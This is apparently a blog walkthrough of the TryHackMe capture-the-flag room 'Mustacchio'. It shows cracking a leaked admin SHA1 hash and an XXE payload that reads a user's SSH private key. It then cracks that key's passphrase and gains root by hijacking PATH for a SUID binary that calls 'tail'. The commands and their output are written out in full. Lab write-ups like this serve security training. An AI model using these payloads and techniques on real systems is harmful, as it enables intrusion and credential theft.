THM: Mustacchio

This is Mustacchio from THM. It’s easy rated with no hints; let’s go.

Ports

SSH, a ‘normal’ HTTP port (i.e. on Port 80) and nginx on port 8765.

Normal HTTP

Let’s start there. It’s a blog about mustaches; not much to see. Some enumeration leads us to /custom/js, which contains users.bak, which is:

SQLite 3.x database, last written using SQLite version 3034001

We can open it up, grab a hash for admin and crack it with john:

┌──(root💀kali)-[/opt/thm/mustache]
└─# john hash -w=/usr/share/wordlists/rockyou.txt                    
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-AxCrypt"
Use the "--format=Raw-SHA1-AxCrypt" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-Linkedin"
Use the "--format=Raw-SHA1-Linkedin" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "ripemd-160"
Use the "--format=ripemd-160" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "has-160"
Use the "--format=has-160" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 256/256 AVX2 8x])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
bulldog19        (?)
1g 0:00:00:00 DONE (2021-06-12 02:20) 16.66g/s 11401Kp/s 11401Kc/s 11401KC/s bulldog27..bullcrap1
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed

Now what?

Port 8765

At port 8765 we have an admin login, so we login. Once we get in, we get a page where we can add a comment to the blog. In the page source we see it’s expecting XML and we get a link to http://10.10.206.203:8765/auth/dontforget.bak, which has an example request:

┌──(root💀kali)-[/opt/thm/mustache]
└─# cat dontforget.bak 
<?xml version="1.0" encoding="UTF-8"?>
<comment>
  <name>Joe Hamd</name>
  <author>Barry Clad</author>
  <com>An unnecessarily long paragraph which I have trimmed</com>
</comment>    

We also see this comment (in the page source):

Barry, you can now SSH in using your key!

So what are we doing here? Getting the SSH key with an XXE attack. Here’s my payload:

POST /home.php HTTP/1.1
Host: 10.10.206.203:8765
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1066
Origin: http://10.10.206.203:8765
Connection: close
Referer: http://10.10.206.203:8765/home.php
Cookie: PHPSESSID=9tp014noj2vk3h3vp9v20jq716
Upgrade-Insecure-Requests: 1

xml=<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///home/barry/.ssh/id_rsa"> ]>
<comment>
  <name>%26xxe;</name>
  <author>gh</author>
  <com>The long paragraph whatever</com>
</comment> 

Now this did actually take me a while to figure out, even though I knew it was XXE. What was happening was that anytime ‘&’ was used, the request was dropped. So you have to URL encode the ‘&’ to get the attack to work.

The SSH key is encrypted but we can crack that and log in:

┌──(root💀kali)-[/opt/thm/mustache]
└─# python /usr/share/john/ssh2john.py key > key.john
                                              
┌──(root💀kali)-[/opt/thm/mustache]
└─# john key.john -w=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
urieljames       (key)
1g 0:00:00:03 DONE (2021-06-12 03:49) 0.2732g/s 3918Kp/s 3918Kc/s 3918KC/sa6_123..*7¡Vamos!
Session completed
                                              
┌──(root💀kali)-[/opt/thm/mustache]
└─# chmod 600 key
                                              
┌──(root💀kali)-[/opt/thm/mustache]
└─# ssh -i key barry@10.10.206.203                         
Enter passphrase for key 'key': 
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-210-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

13 packages can be updated.
10 of these updates are security updates.
To see these additional updates run: apt list --upgradable



The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

barry@mustacchio:~$

Root

Some manual enumeration finds an unusual SUID binary:

barry@mustacchio:/home/joe$ ls -lash
total 28K
4.0K drwxr-xr-x 2 joe  joe  4.0K Apr 29 20:32 .
4.0K drwxr-xr-x 4 root root 4.0K Apr 29 20:32 ..
 20K -rwsr-xr-x 1 root root  17K Apr 29 20:32 live_log
barry@mustacchio:/home/joe$ file live_log
live_log: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=6c03a68094c63347aeb02281a45518964ad12abe, for GNU/Linux 3.2.0, not stripped

What does it do?

barry@mustacchio:/home/joe$ ./live_log
10.9.10.123 - - [12/Jun/2021:07:46:48 +0000] "POST /home.php HTTP/1.1" 200 1123 "http://10.10.206.203:8765/home.php" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"
# etc

It appears to be reading the nginx log. If we go look, we can read the log but not write to it, since we are in the adm group:

barry@mustacchio:/var/log/nginx$ ls -lash
total 8.2M
4.0K drwxr-xr-x  2 root     adm    4.0K Apr 29 20:32 .
4.0K drwxrwxr-x 10 root     syslog 4.0K Apr 29 20:52 ..
8.0M -rw-r-----  1 www-data adm    8.0M Jun 12 07:48 access.log
188K -rw-r-----  1 www-data adm    181K Jun 12 07:47 error.log

I exfil the file with SCP:

┌──(root💀kali)-[/opt/thm/mustache]
└─# scp -i key barry@10.10.239.174:/home/joe/live_log ./live_log            
Enter passphrase for key 'key': 
live_log  

And check the contents with ‘strings’

# snip
Live Nginx Log Reader
tail -f /var/log/nginx/access.log
:*3$"
GCC: (Ubuntu 9.3.0-17ubuntu1~20.04) 9.3.0
# snip

So the binary is running as root and calling ‘tail’ without a path. We know what to do:

barry@mustacchio:/home/joe$ which tail
/usr/bin/tail
barry@mustacchio:/home/joe$ cd /dev/shm
barry@mustacchio:/dev/shm$ echo sh > tail
barry@mustacchio:/dev/shm$ chmod +x tail
barry@mustacchio:/dev/shm$ export PATH=/dev/shm:$PATH
barry@mustacchio:/dev/shm$ /home/joe/live_log
# cd /root
# id;hostname;date
uid=0(root) gid=0(root) groups=0(root),4(adm),1003(barry)
mustacchio
Sat Jun 12 08:59:44 UTC 2021
#

Good one zyeinn.